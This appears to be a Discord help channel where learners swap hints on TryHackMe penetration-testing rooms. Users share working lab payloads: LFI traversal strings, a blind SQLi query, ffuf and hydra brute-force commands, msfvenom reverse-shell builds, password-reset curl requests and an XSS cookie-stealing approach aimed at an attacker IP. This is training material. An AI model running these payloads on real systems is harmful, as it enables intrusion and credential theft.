#room-hints
Same here…
Can anyone lend a hand in the Walking an Application room of the Jr. Pentester path: I cannot find the "directory listing" flag in Task 3. I've found every other flag but can't seem to find what they're talking about for that one. Any hints would be greatly appreciated.
You're overthinking it. Try other HTTP methods besides GET.
I did, and it still has filters for the null byte. I am taking a break from it, I know it is simple, will get back to it later with a fresh mind.
The new room Linux PrivEsc Task 5. I can't transfer the exploit to the target, permission denied. Is this normal?
Not all directories are writable (by the user).
Oh ok thanks. Didn't say that in the instructions.
Well, that's something you should find out, haha.
Try looking around for writable folders
You don't have to look deep
Coffee time
Hey, I'm doing the REloaded CTF and I'm struggling to modify the instruction on level 2
I've done levels 0, 1, 3
But I can't get the level 2 flag
Note: I'm not struggling to export it, I'm struggling to MODIFY it
I just can't find the modify button to access it
Dm me if you can help me out
Has anyone done the XSS room in the JR penetration path?
Hi, I am working on networkservices and it's asking what port SMB runs on and I have tried 445/tcp and it would not accept the answer. Any clue?
I recommend googling it. Two ports are common with SMB. 445 is one of them.
Got it thanks.
Gave +1 Rep to @wanton pollen
Anyone on the new Jr Pentester path?
Walking an Application lab... I need to know what the directory is. It's saying run the directory in your web browser. I must be blind
Sorry wrong room. Let me check real quick
What question is it?
@dusty gyro what task?
have you tried viewing the source file?
Check where all the files are listed
Yes I viewed page source, I just don't understand what directory to check
What directory are all the files listed in
Ok so I had some help earlier today before I had to go to work, but I had no success with questions 3 and 4 on "Walking An Application", pen testing.
Question 3. What is the directory listing flag?
Question 4. What is the framework flag?
I've been looking and trying, but now I must ask for some hints. Please and thank you.
HINT for question 3: Look at the directory all the other files are located in.
@wanton pollen +1
@idle basalt same question 3 is like wth
In the source page there are other files. Look at their paths.
ok thanks, let me go and see.
Gave +1 Rep to @wanton pollen
@wanton pollen do you guys maybe have a line number?
line 45
line 46
line 47
@dusty gyro are you stuck on task 3? Look at the comments at the top
I have the directories but don't know how to access the flag.txt file.
I'm totally blind
What directory are you looking at?
I've clicked on those links and still don't see the flag for question 3, I've Ctrl-F'd to search and I'm not getting anywhere
I see that it's all linked to assets but I can't get anywhere with that dir
have you entered http://[ipaddr]/[file_from_comment] ?
Let's run just the assets path
that is the correct directory. Look at all the files listed
You're welcome
@dusty gyro not sure if your username is a Breaking Bad reference or Reservoir Dogs... either way, I like it
@plucky snow the one you think is the coolest.
nice... breaking bad it is!
I see why I was having a problem with most of what I was trying to do: I had the same IP address from the first time I logged in and didn't know that every time you log in you get a different IP. So nothing was working
I meant why I was having problems
Yeah thanks a lot for your help
Gave +1 Rep to @plucky snow
@idle basalt rock on!
how to do the RFI in file inclusion playground challenge?
I didn't really understand how to implement the RFI
Then go through the room again first, then be more specific: which part didn't you get? How to create the payloads?
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://machine_ip/customers/login -fc 200
Does the command contain any kind of error?
Because whenever I am trying to brute force, I get no results
i know machine_ip will be replaced
The issue I had with that command is that SecLists wasn't in the wordlists folder, so I had to modify the path. Other than that, the command looks good
Yeah, I got it now
But I can see that it's located correctly
in the machine
does your valid username file correctly list the usernames only?
it also has [some shit]
then modify the file so that it has only the usernames
In my case I got an error when I used the file with the raw output
So I modified the file so that only the usernames remained, line by line, and it worked then
ok
Thanks man, it worked
nice
In Lab #2, what is the directory specified in the include function?
I have been trying to solve this for the past day... but I didn't get it
Can someone help with this?
||look at the cookie, look at the directory. look at the cookie, look at the directory.|| does something strike you?
Can I get a hint for exploitingvulrabilityv2
I can't find the CVE or exploit anywhere
Nessus doesn't know... Exploit Database has no clue
Anyone give me a nudge on why my LFI isn't working on Skynet? It's taking my rev PHP from my HTTP server fine but won't execute to give a shell
Have screen shots lol
Could you provide a room link and a task number?
Jr Pentester path, SQLi room, task 8
Found the column names but not able to proceed further
Please help
What kind of reverse shell did you use?
PHP reverse shell
Dm me the command you're using as well as the shell
Anyone able to DM me for some help with the FileInclusionVM, task 8, flag3
What have you tried so far?
Methods scan shows the site supports GET, HEAD, POST, and OPTIONS
For GET, it is filtering special chars used in the previous tasks. Does not escape with %00 or /.
GET also appends a '.php' to the input
POST does not respond to anything and appends '.php'
You did something wrong then
I've tried again to check using php://input, php://filter and data://text/plain;base64 to escape whatever is being filtered for function include and include_path
The base64 still is being filtered and it cannot escape the appending of '.php' for POST or GET.
hex encode doesn't work either
Used all the same steps with language and it doesn't work either.
In all the responses I've captured in Burp, the form action is still set to ".//chall3.php" method=GET
I'm noticing if I test manually in the browser, replaying requests and editing them, the response URL shows '/challenges////chall3.php...'; the '/' seems to be getting added after each try
Is that part of the issue? Should I only be using Burp/Zap?
I used curl to do it
Should I be manipulating the 'referer' header at all for a POST?
I've gone through all the same manual tests with referer on GET and POST and it still doesn't seem to work
No
Just remember, just because you can't visually see the data you input being returned doesn't mean it's not there
curl worked fine for me
Completely hung at the SSRF / anyone have any hints with the first part?
You mean task 2?
Yes lol, I saw some notes you posted and still a bit confused.
Mh, well first I would try to figure out where you have to put the server.website.thm/flag?id=9 in the URL in order to make the server request at the bottom start with https://server.website.thm/flag?id=9
So the standard URL if you start that task is https://website.thm/item/2?server=api, so what for example happens at the bottom with the server request if you replace the api with test1234?
I don't even wanna talk about it. The "=api" is what caught me, where I was trying to use that rather than seeing that as the variable. Thanks man
Gave +1 Rep to @left thunder
TryHackMe… the curse of overthinking lol
You are welcome
So I have a telnet session open and this question asks me what word the generated payload starts with, but when I run the command nothing happens
Hold on
might just be the wrong IP
still nothing happens
Is the word generated supposed to be on the local machine or on this same telnet session?
You have to run the msfvenom command on your attackbox terminal and not in the telnet session
<--- @left thunder Thank you!
Gave +1 Rep to @left thunder
Hello guys, was there anyone who had an issue with Cross-site Scripting getting the last session cookie?
I spent hours trying yesterday but couldn't receive the cookie :-((
Hello, I was having trouble using the commands provided in the Authentication Bypass room, the brute force section. I can't get the command to work and I've tried several ways and I've also tried using the repository on GitHub. Please help.
direct message me
I am stuck, maybe just overthinking, can't find the answer to what framework the favicon belongs to. I have the md5sum but it does not help
Yes, I found my md5sum
Hmmm, it does not fit in the answer
yes
my sum is 3 words
Ok, favicon, last word
Can I DM you? Don't want to spoil it here for everyone
Direct message me
ANYONE could help me with Blind SQLi - Task 8? Stuck at enumerating records... already have the table, columns and all the stuff
could you copy/paste what your query looks like so far? (spoilered of course)
I'm stuck on Lab3 for the file inclusion I got the file to be displayed but in the wrong format apparently
Hi, I'm stuck at the File Inclusion room on challenges - capture flag2. Can anybody guide me for this?
This ended up giving me the help I needed, thanks!
Gave +1 Rep to @left thunder
Hi guys
Can anyone help me
I am stuck at the point below
Now rerunning Curl Request 2 but with your @acmeitsupport.thm in the email field you'll have a ticket created on your account which contains a link to log you in as Robert. Using Robert's account, you can view their support tickets and reveal a flag.
Curl Request 2 (but using your @acmeitsupport.thm account):
user@proud scarab:~$ curl 'http://10.10.204.219/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'
Answer the questions below
What is the flag from Robert's support ticket?
When I ran the above command nothing is happening
And I am getting the same output for all three curl commands as suggested in the task description
please help
Room - Authentication Bypass
In the Jr Penetration Tester path
Did you replace the {username} variable in the command accordingly?
Helped him with #room-\
Well, that's awkward.
But yes, that is what he forgot to do.
Could also be the case that he signed up with the user {username}.
Would be an interesting name to be sure.
Room https://tryhackme.com/room/fileinc, File Inclusion, Task 8, capture flag 3
. and / are filtered so adding ../../../../../etc/passwd results in etcpasswd. Any idea how to bypass this filter? I've already tried ....//....//...// and several encodings. The result is always etcpasswd
Is this the one where the hint is "not everything is filtered"?
yes
Try sending your request with a different method. :)
because of the hint I thought maybe doubling would work.
OK, was scratching my HEAD about that, will try that
Good luck, and remember if you send a POST request you need to include the parameters in the body and not in the query.
Worked perfectly, ty
Gave +1 Rep to @lean rover
Has anyone worked through the blind xss, task 8 in room xssgi, using netcat? I'm not catching anything in the listener when triggering the stored payload.
But the THM request catcher seems to catch only DNS requests. No cookies
Ah figured it out. Was not getting the cookie with 'fetch' so I changed it up to using a 'new Image()src=attacker_ip/?cookie= ...'
Guys
Can anyone help me in the File Inclusion room
Challenge Capture Flag 1 at /etc/flag1
The input form is broken! You need to send a POST request with the file parameter!
please help
done
Hello everyone, I am in the "Burp Suite: The Basics" room, and I am stuck in a question for hours and I am not finding it. Please help me.
The question is below -->
There is one particularly useful option that allows you to intercept and modify the response to your request. What is this option? Note: The option is in a dropdown sub-menu.
Try right clicking an intercepted request on proxy tab
Hello, I'm at Windows PrivEsc, task 5 DLL hijacking. I cannot manage to connect as the other user. I did as it says in the hint: You can modify the skeleton code using this snippet: system("cmd.exe /k net user jack Password11"); but when I try to connect it says that the password is wrong. I tested the example with the first DLL where it outputs the whoami to a file and it's working perfectly.
got it.
I need some help with task 2 of SSRF https://tryhackme.com/room/ssrfqi
I have spent hours at this point trying to research and make sense of this, but I cannot get the server to request correctly. I need to request https://server.website.thm/flag?id=9 and the best guess I have is https://website.thm/item/2?server=server.website.thm/flag&x=&id=9. I don't necessarily want the answer spoon-fed but I'd really like to know the logic behind why this doesn't work and how I can be led in the right direction.
You know what &x= does right? As if you know what it does, it makes no sense to put it in the place you put it for your best guess solution.
Just use hint and focus on this "In this example, the attacker can control the server's subdomain to which the request is made. Take note of the payload ending in &x= being used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string."
I could need a hint for the new file inclusion room, task 8 question 2-3
Play around with the cookie value to see what happens. (Question 2)
I just solved flag 2
Now I only need 3 + playground
Same for me, but I'm too tired to do them today, so therefore I don't have a hint for you
You already helped enough, thanks
Gave +1 Rep to @left thunder
I've been on Q3 in that same room for a bit, still racking my brain about it
Which you need help with Challenge 3 or playground?
Challenge 3, haven't looked at playground yet
What have you tried so far?
Changing requests I know of (POST, GET, COOKIE) changed cookie, tested out all characters and tried inputting via address bar, input box, curl and the inspector tool
I figured out what the filter does and thought encoding would work, but hasn't panned out yet
Also tried a bunch of random lines from PayloadsAllTheThings in the File Inclusion/Filters section
What happened when you changed it to POST?
Everything got scrubbed, so a GET request of ../../../etc/flag1 would return etcflag.php, but a POST request of that same thing would return only .php .....
Ah ok I'm a bit closer, just have to figure out how to drop the .php off I think
Why would a post request drop everything? Is it really dropping everything? What is a POST request? Are you actually asking for any data to be displayed for you?
Just some things for you to consider
Yeah I'm following you, but oddly enough if you change the page source to POST and input your directory traversal payload it doesn't get filtered (but keeps the .php on the end, even with null bytes)
My line of thinking could definitely be out in left field though
Yep I'm running through that
You're getting there. You just need to figure out how to remove the .php. There is a way to do it. Just keep trying
I'm at the same point. Feel like I've tried almost every way to remove the .php. Can I get a direction to work in?
@wintry wyvern have you found anything?
Nada. Still struggle bussin over here.
Only thing odd that I've noticed is that it's posting to .//chall3.php instead of ./chall3.php, but idk if that's of any significance.
I've tried changing it
Yeah I see what you're talking about... It'll be something totally easy, just watch lol
Were you able to figure it out? I'm in the same boat, I found and checked the hash but cannot get the answer to pass
Hello everyone, I'm stuck on the questions in Walking An Application
What is the flag from the HTML comment?
What is the flag from the secret link?
What is the directory listing flag?
does anyone have the answer please
Hey
Anyone available for a small nudge for CCT2019 - crypto 1c ?
Do you still need help with the file inclusion?
Hello, I am doing CC Pentesting and I am trying sudo john --format=RAW-MD5 txt but I get the output
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
No password hashes left to crack (see FAQ)
any ideas?
task six of ?...
5, sorry :))
morning here
I simply can't understand it and I read the room entirely all over again
have you tried the cheat sheet they link in the room
sure
Yes. Redid it again and got a different sum, not sure how or why, but this time the correct one
Yeah I later noticed my machine was out of time. I will try again when my free time is back! Thanks
Gave +1 Rep to @white elm
Nice
You are here too
I do. Still haven't figured it out
Guys please help - room SQL Injection - Jr Pen Tester - task 8 Blind SQLi - Time Based
I successfully found out the database name as sqli_four
But not able to find the table name
I am running the query below
https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_scheme = 'sqli_four' and table_name like 'a%';--
I tried a to z
I need help on the room Authentication Bypass - Task 5 Cookie Tampering - I'm trying to run on the command line curl -H machine_IP Set-Cookie:session=eyJpZCI6MSwiYWRtaW4iOnRydWV9; Max-Age=3600; Path=/ => I have the following error: curl (3) ended with 's' - and - Max-Age=3600: command not found
You got absolutely zero 5-second waits?
yes
Yes, I got a 5 sec hold when I execute admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four%';--
for database name
WHERE table_schema
Not table_scheme
nice catch
@steady stratus I feel bad pinging ninja a 4th time so I'm pinging you now
Cmn isn't a mod.
Pinging us in each channel isn't overly helpful, it's basically always in every channel.
Can someone help with task 5 of the Command Injection room?
Doing Zeno. I got the script working once. Thought it hung up so I killed it and tried again. Now I am getting connection refused over and over. I haven't changed anything. Is this a part of this box?
My bad for this silly typo. Thanks!! Appreciated
Gave +1 Rep to @waxen mica
Literally reading through your replies about TASK 2 SSRF helped me...I needed to slow down and pay attention. Thanks!
Gave +1 Rep to @sly moth
Happy learning!!
Can anyone help me about a msfvenom error?
I have successfully executed a msfvenom command: msfvenom -p linux/x64/shell/reverse_tcp -b "\x00" LHOST=10.11.47.25 LPORT=4545 -f elf -o x64shell.elf
And downloaded in the victim machine but when I am executing the x64shell.elf code, I am getting the following error -->
$ chmod +x x64shell.elf
$ ./x64shell.elf
Segmentation fault (core dumped)
Did you verify the system architecture of the target machine?
It might be x86 and thus not working with the x64 binary
Did not verify, but I have tried with both the x64 and x86 payload. But getting the same error.
Could you please provide the room name, so that I can try to look into it on my side?
Metasploit: Exploitation https://tryhackme.com/room/metasploitexploitation
Task 6 Msfvenom
question 2: meterpreter payload "linux/x64/meterpreter/reverse_tcp"
It did work for me using.
I have used stageless payload
msfvenom --payload linux/x86/shell_reverse_tcp LHOST=$MY_IP LPORT=$PORT -f elf -o meta
okay. I am trying with it.
BTW, looks like my subscription is over
I will try your method once I subscribe again soon
I didn't use -b (bad chars). You tried with/without?
Okay. Thank you.
Gave +1 Rep to @sturdy hearth
noted
It worked.
Aren't you using msfconsole?
Because for staged payloads, msfconsole sends the stage when it receives the connection first
Yes I am using msfconsole
meterpreter > hashdump
[-] The "hashdump" command requires the "priv" extension to be loaded (run: load priv)
meterpreter > load priv
Loading extension priv...
[-] Failed to load extension: i486-linux-musl/priv not found
Can anyone correct me?
What am I doing wrong?
`msf6 post(linux/gather/hashdump) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > options
Module options (post/linux/gather/hashdump):
Name Current Setting Required Description
SESSION 2 yes The session to run this module on.
msf6 post(linux/gather/hashdump) > sessions
Active sessions
Id Name Type Information Connection
1 shell sparc/bsd 10.11.47.225:4545 -> 10.10.179.193:35442 (10.10.179.193)
2 meterpreter x86/linux murphy @ ip-10-10-179-193.eu-west-1.compute.internal 10.11.47.225:4545 -> 10.10.179.193:35444 (10.10.179.193)
msf6 post(linux/gather/hashdump) > run
[-] Post aborted due to failure: no-access: Shadow file must be readable in order to dump hashes
[*] Post module execution completed`
Also getting an error like this.
You need to have read access to /etc/shadow
Hi all, I have a question about this room https://tryhackme.com/room/oscommandinjection. I tried to put in several PHP reverse shells but it always comes back as text. (I know because it's using input sanitation, so every input word will not be passed except the number.)
I also tried to put echo passthru but I guess I broke the website (website became unresponsive).
Do you have any clue about it?
you can read the flag from the webpage itself. just include the command with the loopback address
Shell isn't important
wow I never thought of it. thanks!!
Gave +1 Rep to @green agate
my pleasure!
how do i base64 encode a list like this:
admin:password
admin:
admin:Password1
admin:password1
admin:admin
admin:tomcat
both:tomcat
manager:manager
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:tomcat
tomcat:s3cret
tomcat:password1
tomcat:password
tomcat:
tomcat:admin
tomcat:changethis
like line by line
you mean like automated?
Probably need a for loop
hmm
If you want to encode line by line
Authentication Bypass task 5: how do I go about decoding and encoding the base64 value?
https://gchq.github.io/CyberChef/ is a great tool for that.
Great, got the answers, thank you @left thunder
Also for base64 you can use the base64 command
If in doubt check GTFOBins
Hey, I need help with the room Wireshark 101, task 7. How do I use/run the files attached to the task? Because my PC can't open .pcap files.
you need to open them in wireshark
ahhhh, that makes sense. Thanks
happy to help
Anyone available?
@waxen mica I'm on subdomain enumeration task 6. I ran the first script. I'm looking for a hint on what the new subdomain would be. Can't find it
@granite sphinx username is nyan
they're both nyan?
Yes
lol
left part of the hash is the username
right one is the password
so yeah nyan:nyan
@burnt rivet
It's just running wild
I mean task 6@burnt rivet
Task 6 first script
The one you mentioned is for the second script@burnt rivet thanks
Gave +1 Rep to @burnt rivet
The task is explaining the process of what you need to do. The first tip is to run the first script. Since it will always give you a result, you need to add what's added in the second script
I see, so the first script would just run anyway, thanksss
@burnt rivet @waxen mica thanks guys. It woooorked =)
Gave +1 Rep to @burnt rivet
Protocols and Servers 2, Task 6, can someone give me the password as it says it's gonna take 219 hours for hydra to find the password lmao
@burnt rivet wdym for the first user? I thought it used the one I specified, I'd assume
hydra -l lazie -t 32 -P /usr/share/wordlists/rockyou.txt imap://10.10.152.***
@burnt rivet you're right, it isn't reaching wtf
hi I'm doing the sensitive data exposure room and I need a hint to something but please don't give me the answer directly
I'm at the point where I need to find the password in the source code of the web page and I keep trying to use CTRL-F and type in things like "password" or "text" etc but I never get to the password
could someone help?
thanks
I am looking at source code of Vulnerable website btw
Try expanding all the divs in the associated section of the site. I believe this is the same room I couldn't find the info either.
Could someone give me a hint on copying an msfvenom payload to a target box? I have an established telnet session, but nothing else to go on.
I tried dragging and dropping the payload into the window and that didn't do anything.
No worries!
@quaint beacon can I DM you regarding the Empline box?
c2Vzc2lvbj04OGE1ZTZhZjVhYWE4YWM0ZDliYTllY2U0NjAxY2NhYg== this is the base64 value
session=88a5e6af5aaa8ac4d9ba9ece4601ccab this is the decoded value
still it's showing incorrect
Of course
Hi everyone, I got stuck in the File Inclusion room of the Jr. Pentester path. Can't solve any challenge questions. Currently on Challenge 1, tried all payloads from PayloadsAllTheThings but can't get it to work
I'm curious if I should add an extra header
any help is appreciated
If you are talking about task 8, what have you tried to get the first flag?
Tried running ../../../etc/flag1
../../../etc/flag1%00
%252e%252e%252fetc%252fflag1
%252e%252e%252fetc%252fflag1%00
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/flag1
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/flag1%00
../../../etc/flag1......................................................................................
../../../etc/flag1............................................
../../../etc/flag1/./././././././././././././././././././././././././././././././././././././././././././.
../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/flag1
....//....//etc/flag1
..///////..////..//////etc/flag1
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/flag1
all these as a POST
Basically tried all the payloads for LFI in PayloadsAllTheThings
Authentication Bypass: Logic Flaw. I have read it 5+ times and followed the steps. I checked DDG to see if there are any walkthroughs on how to do it. None. No write-ups.
What is the flag from Robert's support ticket?
I do the three steps and check the web site link.
I have shut down the attack box each time and started over from the top working through the entire room and find the same answers from top to bottom. I still can't get past Logic Flaw to complete it.
I have that completed. let me know where do you need help with
Authentication Bypass : Logic Flaw step 4
I put in the three
Curl Request 1:
curl 'http://10.10.252.132/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
Curl Request 2
curl 'http://10.10.252.132/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'
Repeat Curl Request 3
curl 'http://10.10.252.132/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'
Have you manually created a user?
Got stuck on the same task, did you try to get flag 2?
I thought I did. I restarted the room.
Tried to recreate the user
An account with this username already exists
None of the challenges so far. Got admin from Challenge 3
you need to create a completely new user
I thought when I closed and terminated the room, it blanked everything.
All other tasks completed except this one.
I'm really not sure if it does. Just start from scratch and make sure you create a new user before Curl2
You need to put your own address (what you entered at the time of creating the account) instead of {username}@customer.acmeitsupport.thm, e.g. guru@customer.acmeitsupport.thm. THEN YOU will receive a ticket to reset Robert's account, and after clicking the reset link you will get the flag in the support ticket section
Couldn't solve any of them... also stuck on the next SSRF Practical section
Same
Just got a solution from the Jr Pen Test room...!
Inspect the current avatar and you should see a base64 string that ends with ==
I'm stuck SSRF example and haven't got to practical yet
oh!
I'm stuck on flag 2 in the file inclusion challenge. switched the cookie but not getting anywhere further
change it again and see what happens
when I change the value I see it on the page, but that doesn't seem to affect the requests I'm making. Am I missing something?
Change it to something unusual, like pumpernickle. Check the request and the response. See if it did what you "expected" or something different
AHH! I missed the most obvious answer, thank you!
Gave +1 Rep to @glass eagle
It's easy to assume its behavior. But we didn't write the code. Test it to understand it.
Thank you. I was also stuck there and it clicked finally
Gave +1 Rep to @glass eagle
Now challenge 3 I have been banging my head on the keyboard for an hour
Yeah. It's hard to know what to look for. Something small, obvious, trying something completely different
Sometimes I switch between devtools/curl/burp just to get a new view on it
what have you tried?
Changing to POST, multiple iterations of ../../etc/flag3 in dev tools. Trying to use different request parameters even though I don't quite understand how to do that
Okay, that's the right direction. Does something (unexpected) happen between your request and the response?
try pumpernickle again and check it carefully
and getting an error doesn't always indicate failure. could be progress
feel free to ping or msg directly for some more 1-1 help
I will start over from step 1 and work through each one. I will create the new user. My only issue is they are asking for Robert's Flag.
Once you do everything correctly you should be authenticated as Robert and see the flag in his open tickets
I just wished the directions were better. On one of the other sections, I created the valid_addresses.txt by hand with the 4 names.
Were you able to read Robert's ticket?
I'm doing the Network Services 2 and I'm having trouble understanding how the syntax for mounting an SMB share works. Here are my tries.
You are using the right syntax (the first one, in case you have the /root/smbthings directory created) but you are not mounting the correct share. The sharename "share" is just an example and not an actual existing one.
no. I will try again tonight or tomorrow.
Ok cool, so through the nmap scan is where I can find the share name?
I think you can, but if I remember correctly, in that task they mention enum4linux, I think it's easier to do it with that.
oooooh is it the /usr/sbin/showmount -e [IP] command?
Oh or that one, yes.
cool thank you ❤️ @left thunder
Gave +1 Rep to @left thunder
Windows PrivEsc: can someone help me, I feel dumb asking this. How do you get PowerSploit onto the web-based Windows machine if I can't use the web browser in the Windows machine?
have you transferred things like linpeas to a linux box?
wget and curl work well, I'll be damned, let me facepalm myself real quick, thanks
Gave +1 Rep to @woven perch
haha no problem. happy to help
Anyone having issues with Windows PrivEsc DLL Hijacking - it will not let me start the service
Has anyone had an issue with submitting the staff-session cookie on Cross-site Scripting?
Thanks again. I finally got the flag with your hints
Gave +1 Rep to @glass eagle
Hello! Can someone give me a hint on Overpass Task 1 please? I'm stuck getting a foothold... I have tried LFI since I get output for some files but I can't access any other files than the "publicly known" ones...
Hey guys, I am stuck in the Authentication Bypass room of the Jr. Penetration Tester path, where we have to find the username and password.
I know I am writing the correct command. When I use the filter -fc 200, I can see that one matching credential is found, but when I use the same command and use ">> filename.txt" to fetch the output into the txt file, there is no output seen there
Can anyone give me a hint here as to what am I doing wrong
Hey @digital bay im stuck at the same spot. Does your output in the valid_usernames.txt look like mine? "[2Kadmin [Status: 200, Size: 3720, Words: 992, Lines: 77]". I get only errors when using this wordlist
That is the issue actually, your username wordlist has to be 1 username per line without any other status codes or whatsoever.
How do I get that, I tried outputting it using "-o" switch and using ">>"
Are there any other ways ?
There are only 4 usernames, so I would just make that file on your own.
After restarting AttackBox and creating the file on my own it worked. thank you @left thunder
Gave +1 Rep to @left thunder
where did you get the LFI? unless you've found something new, that isn't the way in. DM if you want a hint.
I didn't get any LFI, but I thought I could... But found a foothold after starting all over again. But thank you!
Gave +1 Rep to @polar finch
Are you still having problems with this? I just did it, the jobs seem to be running fine
No I got it! Was a stupid mistake...But thank you!
Hello everyone. I am having a tough time getting through the task 5 of Linux PrivEsc from jr pentester.
I have downloaded the exploit code for the vulnerability to the AttackBox. It's a .txt file which I have also transferred to the target machine using wget. But how do I run this .txt exploit file?? :/
If you have the correct exploit you should read its comments. They should give you an idea of what you should do with that file.
Also look up any commands in the comments you don't know
Also, last hint: it should not be a text file
https://tryhackme.com/room/owasptop10 - command injection practical ... I'm struggling with this. How do I get the OS?
I created a new user named scsiraidguru. got the ticket. Thanks.
Gave +1 Rep to @eternal pagoda
How do I give you +1 Rep for your help?
just @ and tag them and say thank you
Gave +1 Rep to @loud lotus
If you are still looking for this, in that task it gives a few commands to try
Gave +1 Rep to @eternal pagoda
if none of those give you exactly what you need then google something like "how to check version of linux"
I would also suggest taking what you find and putting it in your notes. A good free room to look at would be https://tryhackme.com/room/linprivesc task 3
Thanks
Gave +1 Rep to @woven perch
Hello guys, I am stuck at a room (Walking an Application), I don't know the site they're talking about so I couldn't find the flag they are looking for
Can you send a screenshot of the page?
I have figured it out, thanks
Mm, sorry, I am stuck again, I can't find the answer to the last two questions. I want to send the screenshot but I don't know how
??
If you are stuck with something and need help, you should provide more information than only the info that you are stuck
In order to be able to send screenshots in here, you have to verify your THM account in discord first.
!docs verify
I'm going to try it using a kali machine, this is what I got earlier. My first guess was that I'll have to use msfdb
I think you already got an answer to that in another channel? The rev_shell.elf file you have created with msfvenom is supposed to be executed on the target machine. So do you have that .elf file already on the target machine (not on your own machine)?
yes
So while creating that file with msfvenom, what payload have you specified?
Okay and what in that example is deemed the payload?
If you are unsure, you could enter msfvenom -l payloads, which will give you a list with all available payloads.
linux/x86/meterpreter/reverse_tcp
Right, so that means inside the msfconsole, you have to set your listener (multi/handler) to that exact same payload as you have used with msfvenom.
oh, let me try, thanks
Gave +1 Rep to @left thunder
ok
Thank you for your help.
Gave +1 Rep to @eternal pagoda
Good Morning All!!
I am having an issue in the following room:
https://tryhackme.com/room/fileinc | Task 4 - Local File Inclusion (LFI).
I have read through the page several times, but the examples they give in the URL do not in any way match what I am seeing when I am attempting lab 1.
You are prompted to enter a file to include "Example: welcome.php"
This now presents us with the current path: /var/www/html
I then enter: /var/www/html/../../../../etc/passwd
Which returns a hard to read file preview. I press ctrl+u to view page source and get a clean version there.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
I performed an nmap scan and found ports 22 and 80 open. So I assumed we would find a username here, but no dice.
Question 1 asks: Give Lab #1 a try to read /etc/passwd. What would the request URI be?
answer format: `/****.*********/***/******`
I have looked online, and all the walkthroughs state there is a user Falcon which is commented out, but as you can see from the results above that is not the case. It seems to be a similar room, but the layout is different. If someone can please help me understand this better I would appreciate it!
I'm not quite sure what you mean by any user? All you have to do is try to get the /etc/passwd file displayed, which it seems you have successfully done, and then enter the URI you have requested in order to get that file displayed. You kind of did it in a bit of a strange way, which might make your answer not work, but you were at least able to get the file displayed.
I can get /etc/passwd to display as you see above.. But to do so I used the current "path" of /var/www/html/../../../../etc/passwd <---- this does not fit the answer profile they are looking for and it says it is incorrect
The warning implies that you are already inside the /var/www/html directory and with your requested path you are trying to get out of that directory in order to access /etc/passwd. So I'm not sure why you add /var/www/html to your request.
Ok, even if I enter ../../../../etc/passwd without the current path.. it returns exactly the same thing, and every example I found online or from the cheatsheet on GitHub always uses the full path. I'm not getting an error? Not sure where you got that. I'm getting the contents of the file, which is the goal.. but the format of the answer doesn't make sense to me. If there is another way to form the URL for this request it isn't shown in the material
I'm not looking for the answer, I'm looking for what I'm missing or doing wrong. This just isn't clicking
So did you check the hint? The URI is what the browser requests. Check the address bar of your browser (which will show it URL-encoded) or check the dev tools -> network tab to see what URI gets requested.
The URL I'm seeing in Lab1 : http://10.10.198.124/lab1.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd
I did not check the network tab in the developer tools. I will check there now..
Thanks
I have logged in to the machine using RDP
But how do I do enumeration, as the search bar seen in Windows is not available to open cmd?
Hit the Start button and just start typing.
I am inside the machine. It's saying to list users and it's also saying that one of the users contains a flag
I don't have permission for admin and administrator
I have checked jack and user, I didn't find a flag
Sorry, I checked Public and user
jack also has access denied
Booting my VM to take a look
sure!
List users on the target system. One of them resembles a flag.
this is the question
Ah. Well, the task gives a bunch of commands for enumeration. Have you tried any of those to list users?
net users
will list the users on that machine
which should show up the flag, or else I need to dig further into any of the users
which I did for user <-- the only one which I have access to @woven perch
wait
I booted the wrong machine
Yea, one thing to note is normally if the task goes over some commands or specific task, that is probably what you need to do to get the flags or something adjacent to what the task talked about. At least that is how I have approached tasks. If you start doing other stuff you end up going down some rabbit holes.
thanx @woven perch
You are welcome
clear
